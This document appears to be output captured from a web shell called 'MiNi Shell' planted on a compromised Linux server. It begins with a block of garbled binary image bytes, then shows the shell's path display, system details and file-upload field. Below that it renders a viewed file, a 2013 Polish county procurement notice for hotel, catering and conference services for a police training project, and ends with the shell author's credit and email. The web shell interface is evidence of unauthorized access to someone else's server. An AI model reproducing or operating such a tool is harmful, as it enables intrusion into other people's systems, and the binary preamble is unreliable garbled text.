JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/home/vmanager/www/common/web/tenders/20130722/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/home/vmanager/www/common/web/tenders/20130722/287752-N-2013.html

<p class="kh_header"><b>Świdwin: Zorganizowanie pobytu uczestników szkolenia dla Zespołu Użytkowników oraz Seminarium dla Policji w ramach projektu Razem Przeciw Razom</b><br>
<b>Numer ogłoszenia: 287752 - 2013; data zamieszczenia: 22.07.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Świdwiński , ul. Mieszka I 16, 78-300 Świdwin, woj. zachodniopomorskie, tel. 094 3650301, 3650335, faks 094 3650330.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiatswidwinski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zorganizowanie pobytu uczestników szkolenia dla Zespołu Użytkowników oraz Seminarium dla Policji w ramach projektu Razem Przeciw Razom.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usługi hotelarskiej, restauracyjnej i noclegowej wraz z najmem sal konferencyjnych i szkoleniowych w związku z organizacją pobytu uczestników szkolenia i seminarium realizowanych w ramach projektu Razem Przeciw Razom
Usługa hotelowa nr 1 (SZKOLENIE)  pobyt trzydniowy dla grupy liczącej maksymalnie 52 osoby, w tym  przedstawiciele
policji	
wymiaru sprawiedliwości
członkowie zespołów kuratorskich
służby zdrowia	
ośrodków pomocy społecznej  pracownicy socjalni
systemu edukacji  - pedagodzy szkolni
organizacji pozarządowych 
Usługa hotelowa nr 2 (SEMINARIUM) - pobyt dwudniowy dla grupy liczącej maksymalnie 75 osób, w tym przedstawiciele komend policji z terenu województwa zachodniopomorskiego. 
Lokalizacja ośrodka  ośrodek w odległości nie większej niż  80 km od miejscowości Świdwin (woj. zachodniopomorskie). 
Zamawiający sam sporządza listę uczestników szkoleń oraz zapewnia trenerów. 
Wykonawca umożliwi Zamawiającemu realizację działań w związku  z promocją projektu tj. umieszczenia w widocznych miejscach plakatów informacyjnych o projekcie  
Zamawiający zastrzega sobie, iż liczba uczestników  może ulec zmniejszeniu.      W takim przypadku Wykonawca może żądać wyłącznie wynagrodzenia należnego z tytułu wykonania części umowy, bez naliczania jakichkolwiek kar. Liczbę uczestników Zamawiający podaje najpóźniej na 3 dni przed dniem rozpoczęcia  każdej usługi.
Podczas szkolenia seminarium Wykonawca zobowiązany jest zapewnić:
Bazę noclegową i  żywieniową oraz szkoleniową w tym samym budynku. Nie dopuszcza się zakwaterowania w domkach.
W ramach bazy szkoleniowej dla usługi hotelowej nr 1 (SZKOLENIE) Wykonawca zapewnia każdego dnia szkolenia:
3 (trzy) sale szkoleniowe dla max. 18 osób każda oraz 1 (jedną) salę konferencyjną dla max. 52 osób, z oknami, klimatyzacją, bez kolumn i innych barier architektonicznych ograniczających widoczność, posiadające sprzęt do przeprowadzenia szkolenia tj.
ekran,
tablica Flipchart + blok papierowy + pisaki,
stoły i  krzesła tapicerowane  dla max. 18 osób - ustawione w kształcie podkowy z krzesłami po zewnętrznej stronie (kształt litery U) lub w rzędach bokiem do prelegenta wraz ze stołem prezydialnym.
dostęp do Internetu
projektor, laptop.
najmniej 3 mikrofony bezprzewodowe, w tym 2 na stojakach
możliwość podłączenia komputera prowadzącego szkolenie do projektora multimedialnego Wykonawcy;
możliwość podłączenia do gniazda zasilającego urządzeń multimedialnych
personel zapewniający obsługę techniczną sali konferencyjnej w zakresie wymaganym do 
sprawnego i bezawaryjnego działania znajdującego się w niej sprzętu, dostępny dla 
uczestników szkolenia co najmniej 30 minut przed rozpoczęciem obrad i w trakcie obrad, aż 
do ich zakończenia w danym dniu;
podczas szkoleń warunki zgodne z przepisami bezpieczeństwa i higieny pracy (wymóg 
dotyczy  w szczególności wykorzystywanego sprzętu komputerowego, jak też pozostałego 
sprzętu).
W ramach bazy szkoleniowej dla usługi hotelowej nr 2 (SEMINARIUM) Wykonawca zapewnia każdego dnia seminarium:
1 (jedną) salę konferencyjną dla max. 75 osób, z oknami, klimatyzacją, bez kolumn i innych barier architektonicznych ograniczających widoczność posiadającą sprzęt do przeprowadzenia seminarium tj.
ekran,
tablica Flipchart + blok papierowy + pisaki,
stoły i  krzesła tapicerowane  dla max. 75 osób - ustawione w rzędach przodem do prelegenta wraz ze stołem prezydialnym.
dostęp do Internetu
projektor, laptop.
najmniej 3 mikrofony bezprzewodowe, w tym 2 na stojakach
możliwość podłączenia komputera prowadzącego szkolenie do projektora multimedialnego Wykonawcy;
możliwość podłączenia do gniazda zasilającego urządzeń multimedialnych
personel zapewniający obsługę techniczną sali konferencyjnej w zakresie wymaganym do 
Sprawnego i bezawaryjnego działania znajdującego się w niej sprzętu, dostępny dla 
uczestników szkolenia co najmniej 30 minut przed rozpoczęciem obrad i w trakcie obrad, aż 
do ich zakończenia w danym dniu
podczas szkoleń warunki zgodne z przepisami bezpieczeństwa i higieny pracy (wymóg 
dotyczy  w szczególności wykorzystywanego sprzętu komputerowego, jak też pozostałego 
sprzętu).
Nocleg w pokojach 1-2 osobowych o standardzie określonym w rozporządzeniu Ministra Gospodarki i Pracy z dnia 19 sierpnia 2004 r. w sprawie obiektów hotelarskich i innych obiektów, w których są świadczone usługi hotelarskie (Dz. U. z 2006 r. Nr 22, poz. 169 z późn. zm.) dla hotelu trzygwiazdkowego.
Zakwaterować uczestników w pokojach dwuosobowych uwzględniając płeć uczestników a w przypadku nieparzystej liczby osób zapewnić pokój jednoosobowy lub dwuosobowy do pojedynczego wykorzystania;
Dla Usługi Hotelowej nr 2 (SEMINARIUM) zapewnić zakwaterowanie dla min 20% uczestników w pokojach jednoosobowych
Wykonawca nie ponosi kosztów zakwaterowania i wyżywienia trenerów, jednakże należy zagwarantować wolne miejsca trenerom;
Nie dopuszcza się realizacji szkolenia/seminarium w sali, w której podawane są posiłki (śniadanie, obiad, kolacja)
Sale muszą posiadać zaplecze sanitarne, toalety powinny znajdować się w pobliżu sal konferencyjnych i szkoleniowych.
Osobę do obsługi technicznej i stałego kontaktu z Zamawiającym.
Salę restauracyjną - oddzielną salą lub wyodrębnioną powierzchnią restauracyjną, przeznaczoną wyłącznie dla uczestników szkoleń.
Atrakcje takie jak: wellness (jacuzzi, sauny fińska i/lub infrared, basen) bezpłatnie dla uczestników szkoleń przez cały okres pobytu.
Wyżywienia dla uczestników szkolenia tj.
Usługa hotelowa nr 1	Usługa hotelowa nr 2
śniadanie dla max. 52 osób - szwedzki stół (powinno składać się z co najmniej jednej potrawy ciepłej, pieczywa - 150 g, wędlin różnych - 60 g, serów - 40g, masła - 30g, dżemu - 30 g, warzyw świeżych,  płatków śniadaniowych, mleka zimnego  i ciepłego, miodu, napoi gorących i zimnych) - x 2 dni
śniadanie dla max. 75 osób - szwedzki stół (powinno składać się co najmniej jednej potrawy ciepłej, pieczywa - 150 g, wędlin różnych - 60 g, serów - 40g, masła - 30g, dżemu - 30 g, warzyw świeżych,  płatków śniadaniowych, mleka zimnego  i ciepłego, miodu, napoi gorących i zimnych) - x 1 dzień
obiad dla max. 52 osób (dla jednej osoby  powinien zawierać minimum: zupę -  250 ml, drugie danie: mięso różne - 100-150g, ziemniaki, makarony, kasze, ryż  - 200g, jarzyny gotowane - 100 g, surówki, deser, kompot, woda mineralna, soki, kawa, herbata) -  x 3 dni
obiad dla max. 75 osób (dla jednej osoby  powinien zawierać minimum: zupę -  250 ml, drugie danie: mięso różne - 100-150g, ziemniaki, makarony, kasze, ryż  - 200g, jarzyny gotowane - 100 g, surówki, deser, kompot, woda mineralna, soki, kawa, herbata) - x 2 dni
kolacja dla max. 52 osób (porcjowana, danie gorące, zimne dodatki (sałatki, wędlina, ser) - x 2 dni
uroczysta kolacja dla max. 75 osób przy wspólnym stole (dla jednej osoby powinna zawierać minimum (potrawę gorącą  - danie podstawowe (mięso/dodatki/surówki), rozmaite mięsa na zimno np. szynka wędzona, pasztet swojski, kiełbasa, pieczone mięsa z marynatami, sery: deski z serami wędzonymi, oscypkami i serami pleśniowymi,  trzy rodzaje sałatek warzywnych, pieczywo, marynaty (grzybki, buraczki, papryczki, ogórki, cebulki, patisony), ogórki małosolne, sosy (chrzanowy, czosnkowy, żurawinowy) napoje gorące i zimne, wino (300 ml na uczestnika), ciasto typu sernik, wuzetka, kremówka itp. - 2 szt. na każdego uczestnika oraz ciastka cukiernicze - 100  dla każdego uczestnika, owoce (min. 3 rodzaje), koreczki i tartinki po min. 3 szt.  na uczestnika); - x 1 dzień
uroczysta kolacja dla max. 52 osób przy wspólnym stole (dla jednej osoby powinna zawierać minimum (potrawę gorącą  - danie podstawowe (mięso/dodatki/surówki), rozmaite mięsa na zimno np. szynka wędzona, pasztet swojski, kiełbasa, pieczone mięsa z marynatami, sery: deski z serami wędzonymi, oscypkami i serami pleśniowymi,  trzy rodzaje sałatek warzywnych, pieczywo, marynaty (grzybki, buraczki, papryczki, ogórki, cebulki, patisony), ogórki małosolne, sosy (chrzanowy, czosnkowy, żurawinowy) napoje gorące i zimne, wino (300 ml na uczestnika), ciasto typu sernik, wuzetka, kremówka itp. - 2 szt. na każdego uczestnika oraz ciastka cukiernicze - 100 g dla każdego uczestnika, owoce ( min. 3 rodzaje), koreczki i tartinki po min. 3 szt.  na uczestnika); - x 1 dzień
serwis kawowy dla max. 52 osób (kawa, śmietanka do kawy, herbata, cytryna, cukier, woda mineralna gazowana i niegazowana, ciasto typu sernik, wuzetka, kremówka itp. 2 szt. na każdego uczestnika oraz ciastka cukiernicze - 100 g dla każdego uczestnika, owoce (min. 3 rodzaje), koreczki lub kanapki; - 3 dnia 
serwis kawowy dla max. 75 osób (kawa, śmietanka do kawy, herbata, cytryna, cukier, woda mineralna gazowana i niegazowana, ciasto typu sernik, wuzetka, kremówka itp. 2 szt. na każdego uczestnika oraz ciastka cukiernicze - 100 g dla każdego uczestnika, owoce (min. 3 rodzaje), koreczki lub kanapki; - x 2 dni
Wykonawca zapewni w trakcie uroczystych kolacji po uzgodnieniu z Zamawiającym oprawę artystyczną w trakcie w/w spotkania: np. zespół grający standardy muzyki światowej lub DJ.
Wykonawca przedstawi do akceptacji Zamawiającego, własną, szczegółową wersję menu na 2 dni przed pierwszym dniem każdego szkolenia.
Serwis kawowy musi być umieszczony na sali szkoleniowej lub w jej  pobliżu. Obiad i kolacja zostaną wydane w formie bankietu zasiadanego wraz z obsługą kelnerską, natomiast śniadanie  w formie   bufetu szwedzkiego. Wykonawca zapewni obsługę kelnerską wszystkich posiłków w liczbie takiej, która nie spowoduje opóźnień.  Serwis do posiłków: szklany, ceramiczny, sztućce metalowe, obrusy na stołach,  świeże kwiaty na stołach, serwetki, szkło do napoi, podgrzewacze. 
Wykonawca zapewni  bezpłatne miejsca parkingowe dla uczestników szkoleń. 
Zamawiający zastrzega sobie prawo dokonania wizji w celu potwierdzenia czy hotel spełnia wszystkie wymagania Zamawiającego. 
Ogólny zarys harmonogramu szkoleń:
Usługa hotelowa nr 1 w terminie:  3 kolejne dni w okresie od 16 do 20 września 2013 r.
Usługa hotelowa nr 2 w terminie:  5-6 września 2013 r.
Zamawiający informuje, że będą to szkolenia:
usługa hotelowa nr 1 - 3-dniowe prowadzone w wymiarze 24 godzin zajęć dydaktycznych w ciągu trzech następujących po sobie dni tygodnie (od poniedziałku do piątku)
usługa hotelowa nr 2 - 2 dniowe prowadzone w wymiarze 12 godzin zajęć dydaktycznych w ciągu dwóch następujących po sobie dni tygodnia (od poniedziałku do piątku). 
Dla szkolenia 3-dniowego:
Pierwszy dzień
8.00 - 9.00 Przyjazd i zakwaterowanie uczestników szkolenia
9.00 - 18.00 Szkolenie
w tym 3 x 15 - 20 min przerwy kawowe oraz 1 x 1h przerwa na obiad
od 19.00 uroczysta kolacja
Drugi dzień
7.00 - 8.00 Śniadanie
8.00 - 15.00 Szkolenie w tym w tym 3 x 15 - 20 min przerwy kawowe
15.00 - 16.00 Obiad
Trzeci dzień
7.00 - 8.00 Śniadanie
8.00 - 15.00 Szkolenie w tym w tym 3 x 15 - 20 min przerwy kawowe
15.00 - 16.00 Obiad
Dla seminarium 2-dniowego:
Pierwszy dzień
9.00 - 10.00 Przyjazd i zakwaterowanie uczestników szkolenia
10.00 - 16.00 Seminarium
w tym 2 x 15 - 20 min przerwy kawowe oraz 1 x 1h przerwa na obiad
od 19.00 uroczysta kolacja
Drugi dzień
8.00  10.00 Śniadanie
10.00  15.00 Szkolenie w tym w tym 2 x 15 - 20 min przerwy kawowe
15.00  16.00 Obiad
Pierwszy dzień każdego szkolenia zakończony będzie uroczysta kolacją, natomiast ostatni dzień szkolenia będzie zakończony obiadem..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 55.30.00.00-3, 55.11.00.00-4, 55.12.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 23.09.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> W niniejszym postępowaniu Zamawiający nie wymaga wnoszenia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia (załącznik nr 2 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie niniejszego zamówienia ubiegać się mogą Wykonawcy, którzy w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia ich działalności jest krótszy - w tym okresie - wykonali co najmniej 2 usługi, w ramach których Wykonawca zobowiązany był zapewnić wyżywienie, noclegi oraz przeprowadzenie szkolenia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia (załącznik nr 2 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia (załącznik nr 2 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia (załącznik nr 2 do SIWZ)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.powiatswidwinski.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> budynek Starostwa Powiatowego w Świdwinie, Biuro Projektu Razem Przeciw Razom ul. Mieszka I 16 (pok.33), 78-300 Świdwin.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.08.2013 godzina 09:00, miejsce: budynek Starostwa Powiatowego w Świdwinie, Biuro Projektu Razem Przeciw Razom, ul. Mieszka I 16 (pok.33), 78-300 Świdwin.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt został współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, Priorytet VII Promocja integracji społecznej w ramach Programu Operacyjnego Kapitał Ludzki 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com